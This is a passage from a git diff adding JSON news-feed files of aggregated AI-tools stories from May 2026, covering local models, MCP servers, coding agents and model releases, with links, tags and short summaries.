local AI meeting memory setups, or are cloud tools still way ahead for this use case?", + "category": "ai_models" + }, + { + "title": "NeuralCompanion", + "url": "https://reddit.com/r/StableDiffusion/comments/1tftqwg/neuralcompanion/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-05-17T16:07:34.000Z", + "summary": "NeuralCompanion is an open-source, local-first AI companion project for people who like building, experimenting, and seeing how far personal AI can go on their own hardware. It brings together realtime voice chat, local LLMs, TTS/STT, image generation, interactive tutorials, API-friendly workflows, and a modular addon system into one desktop app designed to be flexible, hackable, and genuinely fun to explore. NC also supports avatar systems and avatar engines like VSeeFace, VAM/VAM2, and other experimental realtime avatar workflows. It is still experimental and a little rough around the edges in places, but that is part of the project. The goal is not to make another locked-down corporate assistant. It is to build a customizable AI companion platform you can actually run, modify, and shape yourself. If you are into local AI, creative tools, avatars, plugins, voice interfaces, automation, or weird future-facing software, come take a look. GitHub: [https://github.com/Rakile/NeuralCompanion](https://github.com/Rakile/NeuralCompanion) Discord: [https://discord.com/invite/UqnwX46rcK](https://discord.com/invite/UqnwX46rcK) Developers, tinkerers, artists, AI enthusiasts, and curious peop…", + "category": "creative_tools" + }, + { + "title": "Made a simple template manager and GUI for llama.cpp so I don't have to keep memorizing CLI flags.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tfqrbt/made_a_simple_template_manager_and_gui_for/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch", + "cli_tool" + ], + "matching_tags": [ + "product_launch", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-17T14:15:45.000Z", + "summary": "[Introducing Hexllama](https://reddit.com/link/1tfqrbt/video/uobdgqq1hp1h1/player) Hey, I’ve always found **llama-server** to be more than enough for testing out local models, mostly because it guarantees you always have the absolute latest llama.cpp features and architecture support. But keeping track of different CLI commands, context sizes, and batch settings for different models was becoming a massive headache. Plus, managing multiple terminal tabs when I wanted to run two models at once was annoying. So, I built **Hexllama**. It's a fast desktop interface that gets out of your way and just makes managing llama.cpp easier. No walled gardens, just a clean wrapper. **What it actually does:** * **Template-Based Execution:** You configure your CLI flags (threads, context, etc.) once via a visual editor, save it as a template, and from then on it’s just one click to run. * **Built-in llama.cpp Version Manager:** This is the feature I use the most. It auto-checks the ggml-org repo, lets you download new releases directly in the app, and lets you swap backends instantly (super useful when a new model architecture drops and needs a specific build). * **Integrated HF Downloader:** Sear…", + "category": "ai_models" + }, + { + "title": "Kimi K 2.6 is good and can get free api keys from Nvidia integrate with aider launch in powershell and you got something same as claude code for testing new ideas before paying for claude subscription", + "url": "https://x.com/lordsa_m/status/2055959075012104631", + "source": "X search / AI model updates", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-17T10:30:16.000Z", + "summary": "Kimi K 2.6 is good and can get free api keys from Nvidia integrate with aider launch in powershell and you got something same as claude code for testing new ideas before paying for claude subscription", + "category": "ai_models" + }, + { + "title": "Is there a new Wan2.2 lightx2v (20260412) FP8 version for ComfyUI?", + "url": "https://reddit.com/r/StableDiffusion/comments/1tfkwx7/is_there_a_new_wan22_lightx2v_20260412_fp8/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "github_release", + "tool_update" + ], + "matching_tags": [ + "github_release", + "tool_update" + ], + "importance": 1, + "date": "2026-05-17T09:43:32.000Z", + "summary": "I decided to check the `lightx2v` Hugging Face account and noticed they released an updated version of their distilled Wan2.2 i2v A14b model about a month ago. They uploaded a new version 20260412 on Hugging Face, \"Wan2.2-Distill-Models\" repository. (Can't post a link because Reddit filters block the post) However, they only uploaded the FP32 version, which is also incompatible with ComfyUI. I can't find a converted version via Google or Hugging Face search. Does anyone know how to convert this model to FP8, or would someone be willing to convert it and upload it?", + "category": "creative_tools" + }, + { + "title": "Jackrong/Qwopus3.5-9B-Coder-GGUF · Hugging Face", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tfin40/jackrongqwopus359bcodergguf_hugging_face/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-17T07:33:35.000Z", + "summary": ">**Qwopus3.5-9B-coder** is specially optimized and fine-tuned for high-performance **🤖 Agentic Coding, complex Tool Calling, and logical reasoning.** >*💡* ***Why the 9B Dense Model?*** *We believe that the 9B dense architecture represents the perfect* ***\"sweet spot\"*** *for large language models. It runs seamlessly at 8-bit precision on entry-level 16GB RAM devices—such as standard laptops and the Mac mini—making it exceptionally lightweight yet highly versatile. Without requiring expensive hardware, it allows you to achieve excellent performance paired with impressive inference speeds. Simply put,* ***Qwen3.5-9B is currently the best open-source model in its class.*** # 🛠 Training Strategy The fine-tuning process of this model deeply integrates **Trace Inversion** data augmentation technology with high-quality **Agent Traces**. This systematic approach not only strengthens the model's ability to solve complex programming tasks, but also greatly improves its logical coherence and accuracy when using various tools. This model is designed specifically for the following goals: * 🧩 More structured and stronger logical reasoning capabilities, reducing repetitive thinking * �…", + "category": "ai_models" + }, + { + "title": "2026.5.16 released. Highlights: - xAI Grok via SuperGrok OAuth provides 1M token context window - OpenAI‑compatible local proxy allows any OAuth‑authored provider to speak the OpenAI API Full release notes:", + "url": "https://x.com/OliverB72157882/status/2055972796711502049", + "source": "X search / AI model updates", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 0.9800000000000001, + "date": "2026-05-17T11:24:47.000Z", + "summary": "2026.5.16 released. Highlights: - xAI Grok via SuperGrok OAuth provides 1M token context window - OpenAI‑compatible local proxy allows any OAuth‑authored provider to speak the OpenAI API Full release notes:", + "category": "ai_models" + }, + { + "title": "I ran 100 Claude + Codex sessions in parallel to understand what I'm doing wrong in marketing my open source \"Claude Command Center\". Here's the playbook they came up with.", + "url": "https://reddit.com/r/ClaudeAI/comments/1tfbxmf/i_ran_100_claude_codex_sessions_in_parallel_to/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 0.9400000000000001, + "date": "2026-05-17T01:50:08.000Z", + "summary": "A week ago I launched my open-source project (Claude Control Center) on this subreddit. Got 0 upvotes. Dead in 5 hours. :) \\[The app is awesome - great way to manage multiple sessions and avoid waiting on top of Claude + Codex - try it :) [git:amirfish1/ccc](http://github.com/amirfish1/claude-command-center) . So I spawned **100 Claude + Codex agents** in parallel and asked them to figure out what I did wrong (It had two hours left on my weekly Claude limit and 20% left - tried to think of good use :) ) . 30 minutes and 100 artifacts later, they handed me back a playbook. https://reddit.com/link/1tfbxmf/video/0mi1ytksol1h1/player The headline finding: stars don't come from better code. They come from: marketing surface. Tagline, demo GIF, founder credential, hosted landing page, multi-shot Hacker News, awesome-list inclusion. The system found that gap on its own - I never told it to study marketing. 5-min video walking through the 7 findings + what the agents drafted (Show HN body, X thread, LinkedIn post, channel plan): [https://youtu.be/Tm2svTe\\_Ed4](https://youtu.be/Tm2svTe_Ed4) The video itself - is \\*ON PURPOSE\\* 100% built by the AI who created the agents \\[happy to share th…", + "category": "ai_tools" + }, + { + "title": "Claude Code context-window: /clear after EVERY task in the codebase or are there edge cases?", + "url": "https://reddit.com/r/ClaudeAI/comments/1tfnqmc/claude_code_contextwindow_clear_after_every_task/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 0.54, + "date": "2026-05-17T12:08:39.000Z", + "summary": "So I have been recently coding a bunch with the following setup: I am launching Claude Code CLI inside of my repo (a complete shopify theme; if you are unfamiliar it is 3-8mb of source code, structurally something like this: `layout/ 2–3 files (theme.liquid = root shell)` `templates/ 15–25 files (one per page type, JSON or liquid)` `sections/ 30–50 files (reusable page blocks)` `snippets/ 20–40 files (sub-components, like partials)` `assets/ 30–60 files (css, js, svgs)` `locales/ 5–10 files (i18n JSON)` `config/ 2 files (settings_schema.json = theme editor config)` ) I also have an app set up that shows, what the current usage of the models context windows is currently at in %. **Recently I have been wondering: say I give claude quite a heavy task that involves the typical stack of 3 files (1 .js, 1 .liquid and 1 .css) and this instantly bumps up the context window from 0% to 10%, is there a golden rule that one should always do /clear after such an extensive task or does it depend if say, the next task depends on the same 3 files?** Do you guys have any advice on when the perfect time is to /clear? What are your experiences with this? Do you know of any addons that could facilita…", + "category": "ai_tools" + }, + { + "title": "LLM's on Android (Snapdragon 8 Elite) MOE Experience", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tg3ssd/llms_on_android_snapdragon_8_elite_moe_experience/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-05-17T22:22:53.000Z", + "summary": "So I bought a phone with Snapdragon 8 elite (gen 4) and 24GB ram (Honor magic 7 pro). My experience has been mixed but with solid potential. Hexagon (Snapdragon 8 Elite) NPU and OpenclGPU support and updates have been rolling in fast but still the fastest prompt processing and token generation have mostly been CPU (I would bet that soon enough either NPU or GPU will be faster or more realistically both). CPU has the downside of generating more heat than NPU and GPU inference but overall it's still the fastest **currently**. Now there are no phones with 32gb ram without a virtual ram extension which doesn't work with LLM's ofc, so the best you will do is 24gb ram. What can you do with 24gb ram and a smartphone processor though? Quite a lot actually, MOE has been getting quite popular and their Q4 quants of these models are great and fit into the 24GB. My personal recommendation is IQ4\\_XS and MXFP4\\_MOE since with what I have tested MXFP4\\_MOE is quite faster but for the size IQ4\\_XS can't be beaten. Q4\\_0 is more optimised but quality wise it's worse than both (subjectively from my own experience). Goes without saying but Q4\\_K\\_M is also quite reliable from a speed/quality/size s…", + "category": "ai_models" + }, + { + "title": "While waiting for Fara-1.5 for my coding harness", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tg3kbz/while_waiting_for_fara15_for_my_coding_harness/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-05-17T22:13:11.000Z", + "summary": "Hi all, Not sure many people are aware so wanted to give a word about [Fara-1.5 release](https://www.microsoft.com/en-us/research/video/magenticlite-a-full-stack-agentic-experience-powered-by-small-models/). => this release will likely be the big sister of [Fara-7B](https://huggingface.co/bartowski/microsoft_Fara-7B-GGUF) and built on top of Qwen3.5 Actual Fara-7B performs not bad at all but actually requires a proper implementation, and I really hope the 1.5 will be SOTA, in different (including smaller) versions, and may simplify all the pipeline! I gave my coding agent harness extra built-in features: * browser automation tool allowing navigation either via accessibility tree only (CDP / DOM) or via vision + grounding (the above video uses Qwen3.6 35B + Fara-7B) * the possibility to generate prefilled \"skills\" directly from conversation history + Jobs to schedule auto-run * recording from user actions (requires vllm for video and maybe llama.cpp following [this PR](https://github.com/ggml-org/llama.cpp/pull/21858)?) Feel free to have a look at the project, it is focused on controllability and low context footprint: [https://github.com/leflakk/openclose](https://github.com/le…", + "category": "ai_models" + }, + { + "title": "Pushing the limit: minimax m2.7 q8_0 128k on 2x3090, 256GB DDR4", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tg37t6/pushing_the_limit_minimax_m27_q8_0_128k_on_2x3090/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-05-17T21:59:27.000Z", + "summary": "CPU is just a secondhand 10900x. Using 128k context, unquantized kv cache. Model is at q8\\_0 to mitigate some weird behavior I was seeing at lower quants. Speed is very slow at around 50tps pp, 10tps tg, but usable for coding agent workflows. Anybody else running MoE models in this size class on relatively low-end hardware? For my purposes, speed is less important than accuracy, as long as it's not like literally all day. Any other models you'd recommend I'd try or additional optimization tips that could help within my constraints? I wish they'd released the draft model for MTP on this model but it looks like they declined to do so for 2.7. My ik\\_llama flags -- sorry for the funny formatting, this is pasted out of my vibe coded NixOS config: \"${ik-llama-cuda}/bin/llama-server\" + \" -m ${modelPath}\" + \" --host 0.0.0.0\" + \" --port ${toString cfg.port}\" + \" -c ${toString cfg.contextLength}\" + \" -ngl 999\" + \" --cpu-moe\" + \" -sm graph\" + \" -fa on\" + \" -t 16\" + \" -tb 16\" + \" -b 4096\" + \" -ub 4096\" + \" -np 1\" + \" -muge\" + \" -ger\" + \" --jinja\" + \" --metrics\" + \" --temp 1.0\" + \" --top-p 0.95\" + \" --top-k 40\" + \" --min-p 0.01\"", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-18.json b/data/news-feed-2026-05-18.json new file mode 100644 index 0000000..c2cb2b0 --- /dev/null +++ b/data/news-feed-2026-05-18.json @@ -0,0 +1,273 @@ +{ + "generated": "2026-06-05T00:44:40.968Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-18", + "article_count": 15, + "archived_story_count": 665, + "articles": [ + { + "title": "obsidian-mcp-server: v3.2.0 Released", + "url": "https://reddit.com/r/ClaudeAI/comments/1tg692a/obsidianmcpserver_v320_released/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "product_launch", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "product_launch", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-18T00:07:48.000Z", + "summary": "[obsidian-mcp-server](https://github.com/cyanheads/obsidian-mcp-server) [3.2.0](https://github.com/cyanheads/obsidian-mcp-server/releases/tag/v3.2.0) adds an `omnisearch` mode to `obsidian_search_notes` (BM25-ranked, typo-tolerant, PDF + OCR via the [Omnisearch](https://github.com/scambier/obsidian-omnisearch) and [Text Extractor](https://github.com/scambier/obsidian-text-extractor) plugins), MCP-spec cursor pagination across all search modes, and a `nameRegex` filter on `obsidian_list_commands`. Recent Releases: [v3.1.11](https://github.com/cyanheads/obsidian-mcp-server/releases/tag/v3.1.11) brought the same `nameRegex` filter to `obsidian_list_tags`, and [v3.1.10](https://github.com/cyanheads/obsidian-mcp-server/releases/tag/v3.1.10) added server-level instructions on the MCP `initialize` response. Note: The HTTP endpoint in Omnisearch is disabled by default. You must enable it in the Omnisearch plugin settings. Let me know if you have any questions/issues!", + "category": "ai_tools" + }, + { + "title": "Witchcraft, fast local semantic search on top of SQLite [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1tgqyo8/witchcraft_fast_local_semantic_search_on_top_of/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "open_source", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-18T16:00:06.000Z", + "summary": "**Witchcraft (https://github.com/dropbox/witchcraft)**, an open source project that I built at Dropbox, is a from-scratch re-implementation of Stanford's XTR-Warp semantic search engine ( [https://github.com/jlscheerer/xtr-warp](https://github.com/jlscheerer/xtr-warp) ) in safe rust, using a single-file SQLite database as backing storage, making it suitable for client-side deployment. It runs completely stand-alone on your device, needs no API keys, no vector database, no chunking strategy, no fancy re-rankers, and it is lightning fast (20ms p.95 end-to-end search latency on NFCorpus, at 33% NDCG@10, on an Apple Macbook Pro M2 Max, more than twice as fast as the original XTR-WARP on server-class hardware, at similar accuracy.) The project also includes **Pickbrain**, a CLI that indexes your Claude Code and OpenAI Codex session transcripts, memory files, and authored documents into a Witchcraft database for fast semantic search. Ever wondered \"what was that conversation where I fixed the auth middleware?\" — pickbrain finds it, and lets you resume the session directly. There is also a /pickbrain skill for both Claude and Codex, which equips those tools with global memory across all…", + "category": "ai_research" + }, + { + "title": "I built an open-source VS Code extension to visualize and debug Claude Code sessions in real-time", + "url": "https://reddit.com/r/ClaudeAI/comments/1tgj45v/i_built_an_opensource_vs_code_extension_to/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool", + "cli_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-05-18T10:59:47.000Z", + "summary": "Hey everyone! Running Claude Code in the terminal is amazing, but I hated the \"black box\" feeling of not knowing exactly what the agent was doing behind the scenes, or when it got stuck in an infinite loop. To solve this, I built \\*\\*Argus\\*\\* — an open-source visual debugger and observability tool for Claude Code right inside VS Code. Key features: \\* \\*\\*Real-time Timeline:\\*\\* Streams the JSONL transcripts instantly to show agent steps (Bash, Read, Write, WebFetch). \\* \\*\\*Dependency Graph:\\*\\* Visually maps out which files the agent is touching and how they connect. \\* \\*\\*Cost & Loop Detection:\\*\\* Caught a few duplicate reads and retry loops that were burning tokens unnecessarily. It’s completely open-source (MIT) and lightweight. I’d love to hear your feedback on the architecture or features you'd like to see next! GitHub: [https://github.com/yessGlory17/argus](https://github.com/yessGlory17/argus)", + "category": "ai_tools" + }, + { + "title": "Lemonade v10.5.1: an MTP + ROCm 7.13 quick start for Strix Halo", + "url": "https://reddit.com/r/LocalLLaMA/comments/1th0z6k/lemonade_v1051_an_mtp_rocm_713_quick_start_for/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-18T20:55:54.000Z", + "summary": "Update to Lemonade v10.5.1, then: ``` # Get the model lemonade pull Qwen3.6-27B-MTP-GGUF # Get ROCm 7.13 lemonade backends install llamacpp:rocm # Load the model (MTP args auto-applied) lemonade load Qwen3.6-27B-MTP-GGUF --llamacpp rocm --ctx-size 0 ``` Shown in the video taking a look in the mirror with the help of Pi agent. Github: https://github.com/lemonade-sdk/lemonade Discord: https://discord.gg/5xXzkMu8Zk PS. u/lucifer-vali fixed Fedora 43 support in this release as well :)", + "category": "ai_models" + }, + { + "title": "OpenAI Flex and Priority service tiers are now available for supported OpenAI models, including GPT-5.5. Use Flex for lower-cost requests when latency is less important, or Priority for higher-priority processing when you need it. In the A…", + "url": "https://x.com/NanoGPTcom/status/2056425379171058008", + "source": "X search / AI model updates", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-05-18T17:23:11.000Z", + "summary": "OpenAI Flex and Priority service tiers are now available for supported OpenAI models, including GPT-5.5. Use Flex for lower-cost requests when latency is less important, or Priority for higher-priority processing when you need it. In the API, set service_tier to \"flex\" or", + "category": "ai_models" + }, + { + "title": "Tried every Hermes Agent alternative so you don't have to (2026 roundup)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tgsttq/tried_every_hermes_agent_alternative_so_you_dont/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-18T17:02:19.000Z", + "summary": "Been running Hermes since launch. Love it. But a few people on my team can't get past the setup, and honestly the security situation with some of these self-hosted agents has gotten complicated enough that I put together a proper comparison. Eleven alternatives, split into OSS and managed. Quick take on each: **Open Source** **OpenClaw** is the obvious first stop. 347k GitHub stars, 24+ platform integrations, massive skill library. The security track record is genuinely rough though. 9 CVEs in four days in March, \\~20% of ClawHub packages flagged as malicious by independent audits. Use it but harden it first. **TrustClaw** is what OpenClaw should have been from a security standpoint. OAuth only, sandboxed execution, 20k+ managed integrations. You give up some control but your credentials actually stay safe. **PicoClaw** is absurd in the best way. Go binary, under 10MB, runs on $10 hardware, boots in under a second. Still pre-1.0 but if you need something lean it's hard to argue with. **ZeroClaw** is the Rust rewrite. 3.4MB binary, sub-10ms startup, minimal dependencies. Not trying to be feature-rich. Just trying to stay running. **nanobot** is \\~4000 lines of Python you can actual…", + "category": "ai_models" + }, + { + "title": "Configuration Qwen3.6-35b-a3b (12Gb VRAM)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tgrk75/configuration_qwen3635ba3b_12gb_vram/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-18T16:20:14.000Z", + "summary": "Has anyone here tested different KV cache quantizations and compared their performance? I’m currently using the model in Q5\\_K\\_M with Q4 KV cache on a 12 GB VRAM GPU. With this setup, I’m offloading about 27 MoE layers to the CPU and getting around 90–100 tok/s with a 128k context window. I’m trying to see if I can push it a bit further, since I’m using it inside my own AI agent. The model is already pretty smart, but in agentic workflows it’s not always as strong or consistent as I’d like. I’d be curious to know what KV quantization settings people are using, and how much difference they noticed in speed, memory usage, and output quality. Also, would you recommend trying a different model quantization than Q5\\_K\\_M for this setup? For example, would Q4\\_K\\_M, Q6\\_K, or another quant be a better trade-off for speed, VRAM usage, and reasoning quality?", + "category": "ai_models" + }, + { + "title": "Qwen 35b a3b surprises me", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tgqpa8/qwen_35b_a3b_surprises_me/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-18T15:50:58.000Z", + "summary": "Just wanted to share that I'm pretty happy about Qwen 35b a3b agentic coding performance. I'm running the model in q80 quant, kv cache both q8\\_0 as well, with 262144 in 4090 + 5060 ti, via llama.cpp backend with claude code pointing to localhost. For demo/data analytics purposes, it works pretty well. I haven't used it for large codebases, but it definitely is better than gemma4 26b in my use case. One thing that surprises me is that it seems to get better outcome in agentic coding, than chat. When using it with just chat UI, i found the code qwen35b provide a bit too clunky. I wonder of others have compared its performance against open source harnesses (Pi / opencode).", + "category": "ai_models" + }, + { + "title": "xAI Launches Grok Build — Three-Way Coding War Is Now Open", + "url": "https://x.com/Business_AI/status/2056374805163856261", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-18T14:47:43.601Z", + "summary": "xAI has entered the agentic coding market with Grok Build, creating a three-way race with Claude Code and OpenAI Codex for developer workflow ownership. Braygent's take: this matters for everyone building with AI.", + "category": "ai_tools" + }, + { + "title": "New models when? Forecasting release date.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tgh8to/new_models_when_forecasting_release_date/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-05-18T09:21:34.000Z", + "summary": "After the recent releases, there's almost a sense of emptiness. When do you think new models will be released? Looking at the chart, it's between the end of May and the beginning of June, but... I don't know why, it seems like something's changing about \"open weights\"", + "category": "ai_models" + }, + { + "title": "Cutoff dates of open source models", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tg9rcp/cutoff_dates_of_open_source_models/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "mcp", + "open_source" + ], + "matching_tags": [ + "mcp", + "open_source" + ], + "importance": 1, + "date": "2026-05-18T02:48:12.000Z", + "summary": "I was trying Qwen 3.6-27b and Gemma4 in a siomple web chat. Asked them both a qn like 'recommend the best llm for a 5060ti' and was suprised when they both replied 'user is asking about a card that doesn't exist'. I then saw their knowledge cutoff was early 2025, hence why. But tech advances so fast, in that 1yr+ there have been tons of changes in languages, frameworks, best practices and tech, not to mention AI. of course the model could use MCP etc to do a web search, but its pretraining is still using 1yr+ older knowledge. Found that suprisising and probably explains a few things, but its not something widely known I think", + "category": "ai_models" + }, + { + "title": "Follow-up: adding Ollama support to my open-source cursor-aware AI app - looking for beta testers with vision-capable local models", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tg4ux6/followup_adding_ollama_support_to_my_opensource/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-17T23:07:21.000Z", + "summary": "EDIT 2: Trick-Assignment-828 pointed me at the actual rule update from the mods - Rule 3 Low Effort was expanded to cover LLM-assisted posts without disclosure. Disclosing now: Disclosure: I'm a non-native English speaker (German). This post was drafted by me with AI used for a grammar pass. Structure, technical content, the ask, the Skales reference, and all decisions are mine. Wasn't aware of the rule update until called out in comments. Apologies for missing it. If mods feel this still violates Rule 3 even with disclosure, happy for it to come down. Otherwise leaving up so the technical thread can continue. \\--- EDIT: Updated model list based on this thread's feedback... \\[Original post body\\] Edit: Updated model list based on this thread's feedback — Qwen3.5/3.6 family and Qwen3.6-35B-A3B are the current recommendations, not the older Qwen2.5-VL / Llama 3.2 Vision references that were carried over from my older post. Thanks jacky2060, ilintar, and others for the corrections. \\--- Follow-up to my [latest post](https://www.reddit.com/r/LocalLLaMA/comments/1tcl96f/looking_for_fast_visioncapable_local_models_that/) asking about fast vision-capable local models with reliable tool c…", + "category": "ai_models" + }, + { + "title": "memv ships an MCP server — OSS memory layer for agents, now usable from any MCP client", + "url": "https://reddit.com/r/ClaudeAI/comments/1tg6jjq/memv_ships_an_mcp_server_oss_memory_layer_for/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "tool_update" + ], + "matching_tags": [ + "mcp", + "tool_update" + ], + "importance": 0.9400000000000001, + "date": "2026-05-18T00:20:41.000Z", + "summary": "memv (OSS, Python) gained an MCP server today. If you're building on Claude Desktop / Code / Cursor — or your own MCP host — you get persistent, structured memory without writing integration code. ```bash pip install \"memvee[mcp]\" memv-mcp --db-url memory.db --llm-model openai:gpt-4o-mini ``` Or mount it inside your own process: ```python from memv.mcp.server import create_server server = create_server( db_url=\"memory.db\", default_user_id=\"alice\", embedding_client=my_embedder, llm_client=my_llm, ) server.run(transport=\"streamable-http\") ``` **Surface:** - 5 MCP tools: `search_memory`, `add_memory`, `add_conversation`, `list_memories`, `delete_memory` - LLM optional — retrieval/add work LLM-free; only `add_conversation` extraction needs one - Per-user isolation at every tool boundary, including `delete_memory` ownership check - Concurrent extractions for the same user coalesce onto one task For context if you haven't seen memv before: predict-calibrate extraction (Nemori-inspired) so we don't store everything, bi-temporal model so contradictions expire instead of overwriting, hybrid retrieval (vector + BM25 + RRF). Docs: https://vstorm-co.github.io/memv/advanced/mcp-server/ GitHub:…", + "category": "ai_tools" + }, + { + "title": "Every Markdown File You Write for AI is Already Lying to It", + "url": "https://reddit.com/r/ClaudeAI/comments/1tgilrn/every_markdown_file_you_write_for_ai_is_already/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 0.7, + "date": "2026-05-18T10:34:32.000Z", + "summary": "CLAUDE.md files. System prompts. README files with setup instructions. Architecture docs. API references. Runbooks. Onboarding guides. If you've written a markdown file meant for an AI to read, it almost certainly contains values that were true when you wrote them and are no longer true now. The port your dev server runs on. The current version of the package. Which env vars are actually set. How many tests exist. Whether a service is running. These things change constantly, and markdown doesn't know it. So developers do what honest writers do - they add caveats. \"Check package.json if this is stale.\" \"Verify before running.\" \"New packages may have been added since this was written.\" The intent is good. The effect is a list of things the AI has to go verify before it can do anything you actually asked for. We counted them in a real CLAUDE.md. There were seven. And CLAUDE.md is just one file type - the same problem exists everywhere AI reads markdown today. # The Pre-Flight Tax Here's a representative CLAUDE.md. Nothing here is invented - these are patterns from real production repos: # CLAUDE.md > Before starting any session: Read ~/projects/api-core/SYNC.md first and check for…", + "category": "ai_tools" + }, + { + "title": "Claude Code feels completely different once you install this. Anthropic quietly released an official plugin that transforms Claude Code from a simple coding assistant into a full AI dev environment. It scans your entire project and automat…", + "url": "https://x.com/Shruti_0810/status/2056266132592468126", + "source": "X / @shruti_0810", + "tags": [ + "mcp", + "developer_tool" + ], + "matching_tags": [ + "mcp", + "developer_tool" + ], + "importance": 0.7, + "date": "2026-05-18T06:50:24.000Z", + "summary": "Claude Code feels completely different once you install this. Anthropic quietly released an official plugin that transforms Claude Code from a simple coding assistant into a full AI dev environment. It scans your entire project and automatically recommends: → MCP servers →", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-19.json b/data/news-feed-2026-05-19.json new file mode 100644 index 0000000..d724b0e --- /dev/null +++ b/data/news-feed-2026-05-19.json @@ -0,0 +1,275 @@ +{ + "generated": "2026-06-05T00:44:41.184Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-19", + "article_count": 15, + "archived_story_count": 634, + "articles": [ + { + "title": "Google launches Antigravity 2.0 with an updated desktop app and CLI tool", + "url": "https://techcrunch.com/2026/05/19/google-launches-antigravity-2-0-with-an-updated-desktop-app-and-cli-tool/", + "source": "TechCrunch AI", + "tags": [ + "product_launch", + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "cli_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-19T19:45:37.755Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Google releases Gemini 3.5 Flash for complex agentic workflows, coding, and reasoning at 289 tokens per second and higher scores than Gemini 3.1 Pro on Terminal-Bench 2.1, GDPval-AA, and MCP Atlas — Large token quotas appeared in Google Cloud Console before wider rollout.", + "url": "https://www.digg.com/ai/9p5cqkyn?rank=2", + "source": "Digg AI", + "tags": [ + "mcp", + "product_launch", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "product_launch", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-19T19:45:35.241Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Anthropic just bought the company that generates most production MCP servers", + "url": "https://reddit.com/r/ClaudeAI/comments/1thkkrb/anthropic_just_bought_the_company_that_generates/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-19T11:52:46.000Z", + 